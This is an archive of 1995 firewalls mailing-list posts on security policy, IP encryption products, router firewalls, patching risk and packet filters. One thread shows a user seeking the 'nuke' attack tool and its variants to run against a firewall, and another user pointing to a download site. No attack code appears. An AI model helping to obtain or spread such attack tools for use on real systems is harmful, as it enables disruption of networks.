policy/standard for future Internet connection. Would anyone out there be willing to share example policies that they might have in place. Or provide pointers online where examples might exist. Thanks, Joe Gerrity From firewalls-owner Tue May 2 12:17:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA14342 for firewalls-outgoing; Tue, 2 May 1995 11:16:14 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.6.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA14337 for ; Tue, 2 May 1995 11:16:11 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id NAA07268 for GreatCircle.COM!firewalls; Tue, 2 May 1995 13:04:30 -0500 Received: by ris1.nmti.com (smail2.5) id AA00751; 2 May 95 12:43:41 CDT (Tue) Received: by sonic.nmti.com; id AA13195; Tue, 2 May 1995 13:04:02 -0500 Message-Id: <9505021804.AA13195@sonic.nmti.com.nmti.com> To: Brad Isley Cc: firewalls@GreatCircle.COM Subject: Re: TRUST US and other hooui In-Reply-To: Your message of "Tue, 02 May 95 13:20:12 EDT." <199505021720.NAA03400@sb.lanier.com> X-Mailer: exmh version 1.4.1 7/21/94 Date: Tue, 02 May 95 13:04:02 -0500 From: peter@nmti.com X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Which is magnitudes more difficult to produce than a stereo unit using > VERY SIMPLE line in / line out signal levels and 12.8 volt power. I wouldn't begin to think of designing a stereo unit. Especially not a low end unit designed for cheap manufacture. There's an enormous amount of work goes into one of those things. You can't just brute force your way out of a corner when you're manufacturing in quantity. -- Peter da Silva `-_-' Network Management Technology Incorporated 'U` 1601 Industrial Blvd. Sugar Land, TX 77478 USA +1 713 274 5180 "Har du kramat din varg idag?" From firewalls-owner Tue May 2 12:36:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10882 for firewalls-outgoing; Tue, 2 May 1995 09:11:34 -0700 Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10877 for ; Tue, 2 May 1995 09:11:31 -0700 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.8 $/8.6.12/8.6.4.287) with BSMTP id BS0024403/MAA24404; Tue, 2 May 1995 12:11:50 -0400 Received: (ari@localhost) by fearless.soscorp.com (8.6.10/8.6.4.287) id MAA24701; Tue, 2 May 1995 12:11:38 -0400 Date: Tue, 2 May 1995 12:11:38 -0400 From: ari@soscorp.com (Ari Shamash) Message-Id: <199505021611.MAA24701@fearless.soscorp.com> To: "Patrick Stingley" Cc: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #279 In-Reply-To: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov> References: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our Brimstone firewall product optionally implements swIPe, which is a mechanism for encrypting IP packets between two hosts that understand swIPe. The firewall can be set up to decrypt the packets before they are forwarded as well (standard feature of swIPe). We are keeping up with the standards bodies by working on an IPSP implementation. swIPe was written by John Ioannidis and Matt Blaze. Information (including an Internet Draft, Usenix paper and implementation) is available at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/swipe/. Ari Shamash SOS Corporation >>>>> On Tue, 02 May 95 08:10:42 EST, "Patrick Stingley" said: Patrick> Does anybody know of a firewall other than TIS's Patrick> Gauntlet or Raptor's Eagle/Eaglet that does IP Patrick> encryption? (This is where the TCP(UDP)/IP packet is Patrick> encrypted and a destination IP address preprended for Patrick> another firewall across the Internet. Once received Patrick> at the destination firewall, the encrypted packet is Patrick> decrypted and sent to the appropraite host) I am not Patrick> asking this due to problems with TIS or Raptor, but Patrick> as a result of trying to complete some research into Patrick> this area. From firewalls-owner Tue May 2 13:02:30 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15793 for firewalls-outgoing; Tue, 2 May 1995 11:59:31 -0700 Received: from mailstorm.dot.gov (mailstorm.dot.gov [152.120.130.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA15788 for ; Tue, 2 May 1995 11:59:27 -0700 Received: by mailstorm.dot.gov id AA00282 (5.67b/IDA-1.5 for firewalls@GreatCircle.com); Tue, 2 May 1995 15:00:23 -0400 Date: Tue, 2 May 1995 14:57:54 -0400 (EDT) From: Mark Barnes Subject: Re: nuke vs firewalls To: Sick Puppy Cc: firewalls@GreatCircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Sick Puppy, I took a look via Archie for NUKE and it turned up the FTP site, "en.ecn.purdue.edu" in the sub-directory /nuke. I hope that is what you are looking for. Regards, Mark On Mon, 1 May 1995, Sick Puppy wrote: > I would like to run nuke against a firewall and see what the firewall > spits out. Unfortunately I don't have nuke. NASIRC knows where to find > it but they won't tell. Can anyone tell me where to pick up a copy of nuke? > > Sick Puppy > the Cat_Eating_Dawg > U.S. Dept. of InJustice > > > From firewalls-owner Tue May 2 13:11:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15711 for firewalls-outgoing; Tue, 2 May 1995 11:53:28 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA15704 for ; Tue, 2 May 1995 11:53:23 -0700 Received: from cixgate by relay2.UU.NET with SMTP id QQyoad20648; Tue, 2 May 1995 14:53:35 -0400 Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA11792; Tue, 2 May 95 18:29:22 GMT Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA27117; Tue, 2 May 95 11:22:58 PDT Date: Tue, 2 May 95 11:22:58 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9505021822.AA27117@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com Subject: Shameless Self Promotion (3Com Routers) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks to all who wrote requesting copies of my article on how to build an Internet firewall with a 3Com router. Some of you asked for electronic copies, and I wasn't able to provide any at the time. The article is now on the 3Com web page (http://www.3Com.COM / 192.156.136.11) under Technical Info. By the way, the one person who suggested not using 3Com routers to build a firewall turns out to not believe in using ANY router to build a firewall. Obviously I have philosophical differences with that. However, I think that the main point (also made in the article) is that NO one component is a firewall unto itself, but rather that ALL components related to Internet connections (regardless of brand name) need to be considered as part of a given firewall. Thanks for your support, BobK From firewalls-owner Tue May 2 13:13:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15430 for firewalls-outgoing; Tue, 2 May 1995 11:49:11 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA15392 for ; Tue, 2 May 1995 11:48:45 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA15788; Tue, 2 May 95 14:50:56 EDT Date: Tue, 2 May 1995 14:50:46 -0400 (EDT) From: Scott Barman To: Rick Smith Cc: firewalls@GreatCircle.COM Subject: Re: TRUST US and other hooui In-Reply-To: <199505021544.KAA03682@shade.sctc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 May 1995, Rick Smith wrote: > Peter da Silva replied: > > You mean like non-working turn signals? > > In a car, the problem was limited to the electrical system handling > low wattage devices. It didn't affect the ignition and thus affect the > car's mission critical behavior. Changes to security software are Hmm... I don't know what its like in Minnesota, but in the five states I've held a drivers license, using signal lights are more than a good idea, it's the law. Sounds like a mission critical item to me!! > rarely as well constrained. Software patches can yield race > conditions or infinite loops that shut down service entirely, or could > modify data passing through the security software. These flaws > directly affect the system's overall mission and aren't always obvious > from the source code. Oh... I see. So if your company patches your product that changes the way the logging data is written that breaks scripts my clients use to produce reports for the management types, this is not a problem because it has nothing to do with the "mission critical" (I hate that overabused term) nature of the system. And rarely are subtle changes to logging documented or properly documented (I've seen this before!). So what if my signals/reports don't work! The car/firewall starts and is running, what should I care, right? > Rick. > smith@sctc.com roseville, minnesota scott barman scott@disclosure.com (I speak for myself... nobody else wants me to speak for them!! 8-) From firewalls-owner Tue May 2 13:28:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11046 for firewalls-outgoing; Tue, 2 May 1995 09:21:10 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA11021 for ; Tue, 2 May 1995 09:20:54 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA15217; Tue, 2 May 95 12:17:40 EDT Date: Tue, 2 May 1995 12:17:40 -0400 (EDT) From: Scott Barman To: Frank Byrum Cc: Frank Byrum , firewalls@greatcircle.com Subject: Re: Source Code In-Reply-To: <9505021510.AA04553@vbv03.vbv.dec.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 May 1995, Frank Byrum wrote: > On Tue, 2 May 1995, Scott Barman replies: > >On Mon, 1 May 1995, Frank Byrum wrote: > >> Who is responsible if your change > >> causes a security problem? > > > >Whomever made the change is responsible. > I would like to think this is true. It is. As a consultant I know that if I make a change I am responsible. If I forget it, a company is not afraid to hire lawyers to remind me of such. And that's on both sides--the customer and the company whose code I modified. That's why I prefer to keep my changes to a minimum. However, if you're dealing with a vendor who has a Micro$haft-like attitude, sometimes you have no choice. > >Why should you support local changes. I do not know of a single vendor > >who does? As part of your source distribution, you tell the customer > >that if they make changes, they do so at their own risk--and you put it > >in writing! > Agreed! But this does not keep customers from asking or even pointing > to a problem that they have induced as one of ours. True... but I've always made sure to point out to the customer their changes and how it affected the code. However, I handle it differently depending on the customer. A pain in the rear pays, a good customer buys me lunch!! :-) > >I do work for you, you change my work, it's no longer my responsibilty. > >It's just that simple! > Oh to wish that it was as that simple! True... especially in this litigous society! > I wish that this was universally true, but it is not. I can not tell > you the number of times that I have spent looking for a bug in a large > system, only to find that the customer made one minor change (that of > course would not effect the system, so why even mention it) that took > a while to find. I know it happens. I've been there. But you have to draw the line somewhere and make the customer understand the impact of what they do. Network security and firewalls are touchy subjects now and customers are going to have to play by certain rules or they get burned. The handful of customers I've had are bright people but have the networking and network security knowledge of equivalent to that of the early 80s pee cee owner who teaches himself BASIC and thinks he's a maven because they can spell TCP/IP. I've had problems with two of my installations because of this--and I have a "maintenance" agreement with them. I let them know where their mistakes were and warned them that when the initial agreement runs out (1 year), I cannot support their hacking. I do it nicely, but I am serious about it. Only one understands (the other falls in the catagory of a bit brain! ;-). > I do feel responsible for the code that I write. I also feel > responsible for the over all system that we deliver. Daily, I spend > time with customers trying to understand what they like/dislike and > need. This information goes back into the engineering process in hopes of > developing a better product. That's good. I like to hear that from someone at a vendor! I think ALL vendors should be like this. I am tired of the line "it's not a bug, it's a feature!" scott barman scott@disclosure.com From firewalls-owner Tue May 2 14:11:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16397 for firewalls-outgoing; Tue, 2 May 1995 12:20:01 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA16392 for ; Tue, 2 May 1995 12:19:58 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Tue, 2 May 1995 11:40:52 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA28630; Tue, 2 May 1995 11:40:50 -0400 Date: Tue, 2 May 1995 11:40:50 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505021540.AA28630@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #279 Cc: stingley@apwk01g1.nws.noaa.gov Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Dear Fellow Firewallers, > > Does anybody know of a firewall other than TIS's Gauntlet or Raptor's > Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP > packet is encrypted and a destination IP address preprended for another > firewall across the Internet. Once received at the destination > firewall, the encrypted packet is decrypted and sent to the appropraite > host) I am not asking this due to problems with TIS or Raptor, but as > a result of trying to complete some research into this area. > > Thanks in advance, > > Patrick T. Stingley > (301) 713-0882 x104 > stingley@apwk01g1.nws.noaa.gov > MorningStar`s PPP implementation can be used to create an encrypted virtual link between two endpoints. NSC (Network Systems Corporation) has a router that can encrypt the body of IP datagrams but leave the IP headers unencrypted so that they may be routed over an internet. The feature that implements this on their router is called DPF for Data Privacy Facility. You can find out more about it at the URL http://www.network.com/. - Morrow From firewalls-owner Tue May 2 14:14:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17272 for firewalls-outgoing; Tue, 2 May 1995 13:03:22 -0700 Received: from pmsw.army.mil (PMSW.ARMY.MIL [147.57.7.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA17260 for ; Tue, 2 May 1995 13:03:12 -0700 Received: from vinthill-pmsw.army.mil (vinthill-pmsw.army.mil [147.57.7.100]) by pmsw.army.mil (8.6.9/8.6.9) with SMTP id QAA02584 for ; Tue, 2 May 1995 16:05:10 -0400 Received: from cc:Mail by vinthill-pmsw.army.mil id AA799455747; Tue, 02 May 95 15:57:57 EST Date: Tue, 02 May 95 15:57:57 EST From: "Rosenthal, Stephen" Encoding: 12 Text Message-Id: <9504027994.AA799455747@vinthill-pmsw.army.mil> To: firewalls@GreatCircle.COM Subject: Firewall Products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, We are getting ready to set up a direct connection to the Internet and we're interested in setting up a firewall. Can anyone recommend some firewall products that they have had success with? Thanks, Steve From firewalls-owner Tue May 2 14:15:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16980 for firewalls-outgoing; Tue, 2 May 1995 12:49:02 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16969 for ; Tue, 2 May 1995 12:48:55 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA03033; Tue, 2 May 1995 14:42:24 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma003029; Tue May 2 14:42:11 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA24956 (5.67b/IDA-1.5); Tue, 2 May 1995 14:51:48 -0500 Date: Tue, 2 May 1995 14:51:48 -0500 From: Ken Hardy Message-Id: <199505021951.AA24956@ignatz.bridge.com> To: mccomb@interport.net Subject: Re: libc for DNS without NIS ? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk DaVe asked: >Could someone please send me instructions on creating a "libc" under SunOS >4.1.3 that uses DNS instead of NIS. I've seen it posted in the past, but >can't seem to find it now. I think the original document was called >"Making a libc.so for DNS without NIS." This is topic #1 in comp.sys.sun.admin monthly FAQ. -KH From firewalls-owner Tue May 2 15:51:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22119 for firewalls-outgoing; Tue, 2 May 1995 14:58:07 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA22107 for ; Tue, 2 May 1995 14:57:56 -0700 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA08822 for firewalls@greatcircle.com; Tue, 2 May 95 17:53:59 EDT Message-Id: <9505022153.AA08822@all.net> Subject: Re: Source Code To: firewalls@greatcircle.com Date: Tue, 2 May 1995 17:53:58 -0400 (EDT) In-Reply-To: from "Scott Barman" at May 2, 95 12:17:40 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2138 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am astonished that so many people on this list think that making a software modification is so risky. I agree that in poorly designed, written, and documented software, changes may be very tricky, but then there are likely errors in that software already. A typical change I make to software is to remove items from the top-level case statement so as to reduce functionality - to add a function call to make a string lowercase on output to a log file so that sorts will group like things together - or to add information to output logs for detecting specific events - or to add a function to the top-level case statement which turns on a switch that enables some special function I have added to the program. If done with reasonable caution, these sorts of changes are highly unlikely to create the problems we read of, and in addition, such problems will only exist in the code I have introduced, thus providing a degree of security through obscurity. Naturally, all such changes should be thoroughly tested and documented and have an easy back-out mechanism. As far as vendors go, I normally identify the changes to the vendor (in a commercial situation) and get their (perhaps grudging) approval after the fact. This helps reduce the support problem significantly, and in some cases, introduces an option into the next version of the software. Having said all this (which is far more than any of us probably should have said about this in the firewalls digest), I would like to identify that two vendors claim to have GUI management tools that allow distributed management of many firewalls from one easy-to-use interface. I assume that the other vendors do not have this. -- ----------------- \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236 \ /\/ | Check out info-security heaven and test your system \/\ /\/ | for known vulnerabilities (1st time for free) at URL: \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080 ----------------- Read "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 From firewalls-owner Tue May 2 16:10:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21620 for firewalls-outgoing; Tue, 2 May 1995 14:44:12 -0700 Received: from sierra.corsof.com (sierra.corsof.com [198.22.44.240]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA21577 for ; Tue, 2 May 1995 14:44:01 -0700 Message-Id: <199505022144.OAA21577@miles.greatcircle.com> Received: from granite.corsof.com by sierra.corsof.com with ESMTP (8.6.10/16.2) id RAA09184; Tue, 2 May 1995 17:44:21 -0400 Received: from dana.corsof.com by granite.corsof.com with SMTP (1.37.109.16/16.2) id AA292620201; Tue, 2 May 1995 17:30:01 -0400 X-Sender: dana@pop.corsof.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 May 1995 17:42:52 -0400 To: firewalls@greatcircle.com From: DanaNowell@corsof.com (Dana Nowell) Subject: Re: TRUST US and other hooui Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith wrote: > >> > I think the problem with software is that the side effects of changes >> > are much, much harder to predict and control... A properly installed >> > stereo isn't going to blow the fuses or drain the battery. > >Peter da Silva replied: > >> Neither will a properly installed compatible patch. > >The point is that it's much easier to evaluate the correctness of a >stereo installation in a car than it is to evaluate whether a patch is >"properly installed" and "compatible." I don't have any figures on the >failure rate for stereo installations, but they can't possibly be as >risky as software patching. > >> > Also, the >> > most likely failure modes decrease your enjoyment of your car but are >> > unlikely to risk your life and safety. >> >> You mean like non-working turn signals? > >In a car, the problem was limited to the electrical system handling >low wattage devices. It didn't affect the ignition and thus affect the >car's mission critical behavior. Changes to security software are >rarely as well constrained. Software patches can yield race >conditions or infinite loops that shut down service entirely, or could >modify data passing through the security software. These flaws >directly affect the system's overall mission and aren't always obvious >from the source code. > I suppose when the auto dealer swaps out the computer controller that controls the throttle, timing, etc. via software in the latest and greatest revision PROM I'm also at low risk :-). In today's environment just about everything has software wrapped in it's belly somewhere. I doubt (but don't know) that after market controller manufacturers, the guys printing auto parts crossref manuals (used by 'junkyard' owners), or even the original manufacturer is doing complete failure mode analysis. The same holds for the basic $99 microwave oven (assuming it even has a PROM). Add to that the people writing 'toolkit' software who do testing but not massive failure analysis testing (not cost effective at that price point), and then find someone has used their toolkit to build a 911 emergency response system. Face it software is everywhere, if you want to worry about it or be scared about it, visit the Risks group and ask questions. Personally I find it unreasonable to hold a someone to a higher standard than the guy building auto controllers, airplane nav systems, 911 systems, or any other life threatning/saving 'toys' containing software. As I see it, the issue is really, what is considered 'reasonable'. Do I believe my patch is as reliable as the vendor's will be? As with everything else, assumed risk is the bottom line. Is the risk of making the patch less than the risk of going without it? There are few absolutes in life. Sometimes you risk it and patch it, sometimes you wait. Sometimes you add functionality, sometimes you do without. You 'pays your money and takes your chances' just like everyone else. Just remember, if you change it, test hell out of it, its usually the best you can do in the practical world. Dana Nowell Work: DanaNowell@corsof.com Cornerstone Software Inc. Home: dnowell@mv.mv.com I don't even believe myself, why should you! (Standard disclaimer in force). From firewalls-owner Tue May 2 16:39:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24411 for firewalls-outgoing; Tue, 2 May 1995 15:51:59 -0700 Received: from ix2.ix.netcom.com (ix2.ix.netcom.com [199.182.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA24397 for ; Tue, 2 May 1995 15:51:45 -0700 Received: from by ix2.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id PAA03039; Tue, 2 May 1995 15:50:50 -0700 Date: Tue, 2 May 1995 15:50:50 -0700 Message-Id: <199505022250.PAA03039@ix2.ix.netcom.com> From: casares@ix.netcom.com (michael smith) Subject: Re: Policies To: s0ujgg@pacific.fnma.COM (Joseph Gerrity) Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: > >Our organization is in need of a policy/standard for future Internet connection. >Would anyone out there be willing to share example policies that they might have in place. Or provide pointers online where examples might exist. > >Thanks, Joe Gerrity > Our organization is in the same boat. Are there any outlines available? From firewalls-owner Tue May 2 16:49:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24901 for firewalls-outgoing; Tue, 2 May 1995 16:02:15 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24884 for ; Tue, 2 May 1995 16:02:05 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQyoau00578; Tue, 2 May 1995 19:02:15 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28014; Tue, 2 May 95 18:57:38 EDT Date: Tue, 2 May 1995 18:57:36 -0400 (EDT) From: Sick Puppy Subject: Re: nuke vs firewalls To: Mark Barnes Cc: firewalls@GreatCircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks, but nope, taint in there. Done got one copy of nuke.c but there usually be several versions of these critters hacked to varying extents, so that some are more useful than others. Still looking. Come on you CERT and CIAC and DISA d00dz, where can I find nuke? Sick Puppy the Cat_Eating_Dawg Simple country boy, who do simple things. From firewalls-owner Tue May 2 17:37:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27573 for firewalls-outgoing; Tue, 2 May 1995 17:02:00 -0700 Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA26210 for ; Mon, 1 May 1995 23:56:31 -0700 Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id DAA27248 for ; Tue, 2 May 1995 03:00:55 -0400 Date: Tue, 2 May 1995 03:00:55 -0400 Message-Id: <199505020700.DAA27248@jax.jaxnet.com> X-Sender: bwern@jax.jaxnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: bwern@jax.jaxnet.com (Ben Wern) Subject: Help with begining options? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello. This may not specifically be in the charter, but I'm asking anyways. I'm trying to learn as much as possible about firewalls, etc. For my upcoming pitch for an internet connection for my company. If you guys/gals have a free second, I'd love it if you could look at what I am proposing, poke holes in it, and tell me where to go for more information. If not, just delete, but I'd appriciate it if you have the time. My current design consists of a router to connect to the 56k or ISDN link. The router dumps into a unsecure subnet that consists of whatever sacraficial lamb machines I have serving the outside word, and the Firewall. The firewall connects to our internal network. The firewall should allow any outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine inside the net. All other servers (FTP, WWW, Etc. are in the unprotected network.) My question lies in the Firewall server. I've been looking into Janus (or BorderWare, or whatever they're calling it now), but that seems to force us into using they're application servers, and might limit us as far as options go. I've also been looking into Gauntlet, from TIS, and just using the FWTK kit. Unfortunatly, I'm not expecting much money for this, so I expect I'll be forced to scrimp. :( Anyone care to offer thoughts, etc. for a new firewalls person? Thanks, Ben Wern bwern@jaxnet.com | PGP Key available by Finger! bwern@pathtech.com| PGP Mail gets priority! bwern@unf6.edu | Ask for it by name! "I used to get disgusted, but now I just get amused" From firewalls-owner Tue May 2 17:46:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27750 for firewalls-outgoing; Tue, 2 May 1995 17:04:21 -0700 Received: from ninurta.fer.uni-lj.si (ninurta.fer.uni-lj.si [193.2.72.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10978 for ; Tue, 2 May 1995 09:19:56 -0700 Received: from olymp.fer.uni-lj.si (janb@olymp.fer.uni-lj.si [193.2.72.11]) by ninurta.fer.uni-lj.si (8.6.10/8.6.10) with ESMTP id SAA19633 for <@ninurta.fer.uni-lj.si:Firewalls@GreatCircle.COM>; Tue, 2 May 1995 18:20:19 +0200 Received: by olymp.fer.uni-lj.si (940816.SGI.8.6.9/931108.SGI.ANONFTP) for Firewalls@GreatCircle.COM id SAA03577; Tue, 2 May 1995 18:20:05 +0200 From: janb@olymp.fer.uni-lj.si (Jan Bervar) Message-Id: <199505021620.SAA03577@olymp.fer.uni-lj.si> Subject: Screened subnet with one router? To: Firewalls@GreatCircle.COM Date: Tue, 2 May 1995 18:20:04 +0200 (MDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1544 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi there, I am currently designing a firewall and am faced with a difficult decision. Please help me out on this one... Is there any difference in the security of a screened subnet firewall using two routers (one serial-ethernet, the second ethernet-ethernet) opposed to using one router with serial-ethernet-ethernet interfaces? --------------------------------------------------------------------- First design: -- DMZ -- Internet -->|R1|-------------|R2|----- inside net -- bastion -- host --------------------------------------------------------------------- The second one: -- Internet -->|R1|------- inside net -- b. | host |DMZ | - -------------------------------------------------------------------- In both instances, it is impossible to avoid going through the DMZ and the bastion host (with packet filtering on the router(s)). The only problem I see is breaking into the first router in the second design, but if I allow access to the router only via console, then I see no difference. The second design also saves you around $3500 (at least here) for a Cisco 2501 (I am thinking of using the 2514 for the dual-ethernet router). Many many thanks in advance, -- Jan Bervar * jan.bervar@snet.fer.uni-lj.si * http://www.fer.uni-lj.si/~janb --------------------------------------------------------------------------- FER Security Team * The S-Net project * HP-UX & Linux admin * guitarist From firewalls-owner Tue May 2 18:09:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28572 for firewalls-outgoing; Tue, 2 May 1995 17:19:55 -0700 Received: from nisc.jvnc.net (nisc.jvnc.net [128.121.50.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA28562 for ; Tue, 2 May 1995 17:19:48 -0700 Received: from shaddam.usb.ve (shaddam.usb.ve [159.90.10.10]) by nisc.jvnc.net (8.6.4/8.6.4) with SMTP id UAA04527; Tue, 2 May 1995 20:19:23 -0400 Received: by shaddam.usb.ve (4.1/USB-4.5.1) id AA01893; Tue, 2 May 95 20:28:30-040 Date: Tue, 2 May 95 20:28:30-040 From: lem@shaddam.usb.ve (LDC - Luis E. Mun~oz) Message-Id: <9505030028.AA01893@shaddam.usb.ve> To: armandoe@netcom.com, firewalls@greatcircle.com Subject: SUMMARY: BSDI as a screening router Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The original question was about the alternatives available to use a BSDI box as a bridging router. The answers received, mentioned the following solutions: screend: Many experiences (mainly satisfactory) with the software. Reported performance is that a 486@33Mhz can pump about 5Mb/s and a Pentium about 9Mb/s. Good enough to handle a site with a 64Kbit/s. ip_firewall: Consists of kernel patches (no source license required) and a couple of source files. It's reported to be shareware. It's author is danny@nahanni.BouletFermat.ab.ca. The program is available at the following sites: ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0a.gz ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0a.shar.gz TIS fwtk: A good choice, though not suitable for our application. ip_gw: Some screend lookalike. No information provided about this software. ALF: A commercial package that can convert a BSDI box in a full-fledged screening router/packet filter. Contact information follows: Ari Shamash SOS corporation voice 1-800-SOS-UNIX or 1-212-686-5700 461 5th Avenue, 16th floor fax: 1-212-686-5703 New York, NY 10017 email: ari@soscorp.com ip_fil: A loadable kernel module that implements packet filtering with NetBSD. It's reported to work like a charm. This package is available at: ftp://coombs.anu.edu.au:/pub/net/kernel/ip_fil2.5.2.tar.gz Many thanks to: Scott Barman mht@shore.net (Mark Teicher) Danny Boulet 